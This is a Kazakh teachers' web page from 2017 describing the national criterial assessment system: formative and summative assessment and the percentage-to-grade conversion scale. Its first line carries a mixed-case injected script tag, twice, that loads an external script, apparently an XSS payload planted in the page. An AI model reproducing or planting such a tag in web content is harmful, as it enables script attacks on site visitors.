<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

17.10.2017

Критериалды бағалау жүйесінің мазмұны

Қазақстан Республикасы Білім және ғылым министрінің 2016 жылғы 21 қаңтардағы №52 бұйрығы. Қазақстан Республикасының Әділет министрлігінде 2016 жылы 19 ақпанда № 13137 болып тіркелді.

Критериалды бағалау:

Қалыптастырушы бағалау - оқушы мен мұғалім арасындағы кері байланысты қамтамасыз етеді, оқу үдерісін балл және баға қоймай-ақ дер кезінде түзетуге мүмкіндік береді және мұғалім үздіксіз өткізіп отырады .

Жиынтық бағалау - белгілі бір оқу кезеңі (тоқсан, триместр, оқу жылы, орта білім беру деңгейі) аяқталғанда оқу бағдарламасындағы бөлімдер/ортақ тақырыптар бойынша балл және баға қою арқылы өткізіледі.

Жиынтық бағалау үдерісі

Бөлім/Ортақ тақырып бойынша:

· Бөлім бойынша оқу мақсаттарын қамтиды;

· Жаратылыстану және тілдік пәндерден бөлімдер бойынша, әлеуметтік-гуманитарлық пәндерден ортақ тақырып бойынша ұйымдастырылады;

· 15-20 минут уақыт беріледі;

· Ойлау деңгейлері мен бағалау критерийлеріне сәйкес жүргізіледі;

· Балл дескрипторларға сәйкес қойылады;

· Оқу жетістіктерінің деңгейлері бойынша (төмен, орта, жоғары) кері байланыс беріледі;

· Тоқсандық бағаға әсер етеді (50%);

Тоқсан бойынша:

· Тоқсандағы барлық бөлімдердегі оқу мақсаттарын қамтиды;

· Жаратылыстану және тілдік пәндерден бөлімдер бойынша, әлеуметтік-гуманитарлық пәндерден ортақ тақырып бойынша ұйымдастырылады;

· Сабаққа берілген уақытта орындалады;

· Жиынтық бағалау спецификациясына сәйкес өтеді

· Нәтижесі балл қою ережесіне сәйкес қойылады;

· Тоқсандық бағаға әсер етеді (50%)

Оқушылардың тоқсандық бағасын есептеу үлгісі

Бөлім/ортақ тақырып бойынша ЖБ Бөлім/ортақ тақырып бойынша ЖБ Бөлім/ортақ тақырып бойынша ЖБ

15% 15% 20%

Бөлім/ортақ тақырып бойынша ЖБ (50%) +Тоқсандық ЖБ (50%)=Тоқсандық баға (100%)

Балды бағаға айналдыру шәкілі (бастауыш сыныптар үшін)

"1" 0-20%

"2" 21%-40%

"3" 41%-60%

"4" 61%-80%

"5" 81%-100%

Тоқсандық және жылдық бағаны есептеу

Жиынтық бағалау Пайыздық мөлшері

Бөлім/ортақ тақырыптар бойынша жиынтық бағалау 50%

Тоқсан бойынша жиынтық бағалау 50%

Тоқсан бойынша қорытынды баға 100%

Сулеймэн Еркегуль

Просмотров: 1152


Пікір қосу



Деректерді қолтаңбаға қосу